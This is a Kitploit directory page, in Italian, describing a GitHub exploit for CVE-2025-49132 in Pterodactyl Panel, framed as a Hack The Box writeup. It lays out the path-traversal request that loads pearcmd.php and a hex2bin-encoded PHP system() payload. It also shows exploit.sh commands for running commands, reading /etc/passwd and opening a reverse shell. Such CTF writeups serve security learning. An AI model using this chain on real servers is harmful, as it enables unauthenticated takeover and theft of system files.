Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-49132_HTB_SEASON10 — Exploit RCE non autenticato per CVE-2025-49132 in Pterodactyl Panel tramite path traversal, command injection PEAR ed esecuzione di codice PHP. Include writeup HTB e script di supporto. | Kitploit
Strumenti/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Exploit RCE non autenticato per CVE-2025-49132 in Pterodactyl Panel tramite path traversal, command injection PEAR ed esecuzione di codice PHP. Include writeup HTB e script di supporto.

Vedi Repository
26 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-49132 - Exploit RCE del Pannello Pterodactyl

Stagione 10 HTB - Writeup della macchina Pterodactyl

Panoramica

Obiettivo: Macchina HTB Pterodactyl (Difficoltà Media)
CVE: CVE-2025-49132
Gravità: Critica (CVSS 9.8)
Tipo di attacco: Esecuzione di codice remoto non autenticata
Interessati: Pannello Pterodactyl < v1.11.11

Questa catena di exploit combina:

  1. Path Traversal nel sistema di traduzione locale
  2. Iniezione di comandi PEAR tramite pearcmd.php
  3. Esecuzione di codice PHP tramite scrittura di file + inclusione

Il Bug

L'endpoint /locales/locale.json del Pannello Pterodactyl permette il path traversal attraverso il parametro locale:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

Questo può essere concatenato con pearcmd.php di PEAR per:

  1. Scrivere file PHP arbitrari in /tmp
  2. Eseguirli tramite un'altra richiesta

Perché Funziona

PEAR (PHP Extension and Application Repository) ha uno strumento CLI (pearcmd.php) che:

  • Accetta comandi tramite parametri URL (previsto solo per CLI)
  • Ha un comando config-create che scrive file
  • Non ha alcuna autenticazione quando chiamato via web

La catena dell'exploit:

root@kitploit:~
Path Traversal → Carica pearcmd.php → Inietta PHP tramite config-create → Esegui PHP malevolo

Il Trucco Hex2bin()

I comandi sono codificati in esadecimale usando hex2bin() per bypassare:

  • Problemi di codifica URL
  • Filtri di caratteri speciali
  • Problemi di parsing di Nginx/PHP

Esempio:

root@kitploit:~
Command: whoami
Hex:     77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>

Esecuzione di codice remoto

Metodo: Usando exploit.sh fornito

root@kitploit:~
chmod +x exploit.sh

# Get user flag
./exploit.sh flag

# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Reverse shell
nc -lvnp 4444  # On attacker machine
./exploit.sh shell 10.10.14.21 4444

Riferimenti

CVE ed Exploit

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

Risorse tecniche

  • Documentazione del Pannello Pterodactyl
  • Documentazione di PEAR
  • OWASP Path Traversal

Scarica lo strumento